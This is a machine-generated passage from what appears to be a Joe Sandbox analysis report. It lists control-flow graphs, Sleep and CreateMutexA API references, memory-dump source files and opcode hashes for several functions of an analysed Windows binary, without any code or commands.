                                                                                                                                                                                                                                          control_flow_graph 920 269f44-269f64 924 269f66-269f72 920->924 925 269f92-269fae 920->925 928 269f74-269f82 924->928 929 269f88-269f8f call 27d663 924->929 926 269fb0-269fbc 925->926 927 269fdc-269ffb 925->927 930 269fd2-269fd9 call 27d663 926->930 931 269fbe-269fcc 926->931 932 269ffd-26a009 927->932 933 26a029-26a916 call 2780c0 927->933 928->929 934 26a92b 928->934 929->925 930->927 931->930 931->934 937 26a01f-26a026 call 27d663 932->937 938 26a00b-26a019 932->938 940 26a953-26a994 Sleep CreateMutexA 934->940 941 26a92b call 296c6a 934->941 937->933 938->934 938->937 949 26a996-26a998 940->949 950 26a9a7-26a9a8 940->950 941->940 949->950 952 26a99a-26a9a5 949->952 952->950
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 746d33873397d4c754e8a4bd00889ac751dfb530f81ab8868a08695c41ac5a47
                                                                                                                                                                                                                                          • Instruction ID: d6bc2255b7019ed5796ff02c560b3f5877c459d79e2f8a377e42605c71a7ad58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 746d33873397d4c754e8a4bd00889ac751dfb530f81ab8868a08695c41ac5a47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C3168316241008BEF18DB78DDC8BADB77AEF85310F348619E418E72D5CB7699E08B52
                                                                                                                                                                                                                                          Function 0026A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 954 26a079-26a099 958 26a0c7-26a0e3 954->958 959 26a09b-26a0a7 954->959 962 26a0e5-26a0f1 958->962 963 26a111-26a130 958->963 960 26a0bd-26a0c4 call 27d663 959->960 961 26a0a9-26a0b7 959->961 960->958 961->960 966 26a930-26a994 call 296c6a Sleep CreateMutexA 961->966 968 26a107-26a10e call 27d663 962->968 969 26a0f3-26a101 962->969 964 26a132-26a13e 963->964 965 26a15e-26a916 call 2780c0 963->965 971 26a154-26a15b call 27d663 964->971 972 26a140-26a14e 964->972 984 26a996-26a998 966->984 985 26a9a7-26a9a8 966->985 968->963 969->966 969->968 971->965 972->966 972->971 984->985 986 26a99a-26a9a5 984->986 986->985
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 0ec9a675c2b5878c7e45d3f6e675906c408ee525966496e03dc84d005956d705
                                                                                                                                                                                                                                          • Instruction ID: 820359fe30f371d980afea603f4c609671d1534a0a8fd548acfcd8296d7d5ef6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec9a675c2b5878c7e45d3f6e675906c408ee525966496e03dc84d005956d705
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 933146316242009BEF08DB78DEC9B6DB776EF82314F248619E418B73D5C77699E08E52
                                                                                                                                                                                                                                          Function 0026A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 988 26a1ae-26a1ce 992 26a1d0-26a1dc 988->992 993 26a1fc-26a218 988->993 994 26a1f2-26a1f9 call 27d663 992->994 995 26a1de-26a1ec 992->995 996 26a246-26a265 993->996 997 26a21a-26a226 993->997 994->993 995->994 998 26a935 995->998 1002 26a267-26a273 996->1002 1003 26a293-26a916 call 2780c0 996->1003 1000 26a23c-26a243 call 27d663 997->1000 1001 26a228-26a236 997->1001 1008 26a953-26a994 Sleep CreateMutexA 998->1008 1009 26a935 call 296c6a 998->1009 1000->996 1001->998 1001->1000 1004 26a275-26a283 1002->1004 1005 26a289-26a290 call 27d663 1002->1005 1004->998 1004->1005 1005->1003 1017 26a996-26a998 1008->1017 1018 26a9a7-26a9a8 1008->1018 1009->1008 1017->1018 1020 26a99a-26a9a5 1017->1020 1020->1018
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 8d544f21a98524bb1513a70dbb5032206a3386669710075c657f312ac38d1bfe
                                                                                                                                                                                                                                          • Instruction ID: bb11c69098927d4d3dbd6c7e59a064ff3bbccbd7da3c1265afa931d236b02d3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d544f21a98524bb1513a70dbb5032206a3386669710075c657f312ac38d1bfe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03314431664201DBFB08DB78DDC9B6DB776EF86310F248618E408A72D5C77699E08A12
                                                                                                                                                                                                                                          Function 0026A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1022 26a418-26a438 1026 26a466-26a482 1022->1026 1027 26a43a-26a446 1022->1027 1028 26a484-26a490 1026->1028 1029 26a4b0-26a4cf 1026->1029 1030 26a45c-26a463 call 27d663 1027->1030 1031 26a448-26a456 1027->1031 1032 26a4a6-26a4ad call 27d663 1028->1032 1033 26a492-26a4a0 1028->1033 1034 26a4d1-26a4dd 1029->1034 1035 26a4fd-26a916 call 2780c0 1029->1035 1030->1026 1031->1030 1036 26a93f-26a949 call 296c6a * 2 1031->1036 1032->1029 1033->1032 1033->1036 1041 26a4f3-26a4fa call 27d663 1034->1041 1042 26a4df-26a4ed 1034->1042 1053 26a94e 1036->1053 1054 26a949 call 296c6a 1036->1054 1041->1035 1042->1036 1042->1041 1055 26a953-26a994 Sleep CreateMutexA 1053->1055 1056 26a94e call 296c6a 1053->1056 1054->1053 1058 26a996-26a998 1055->1058 1059 26a9a7-26a9a8 1055->1059 1056->1055 1058->1059 1060 26a99a-26a9a5 1058->1060 1060->1059
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
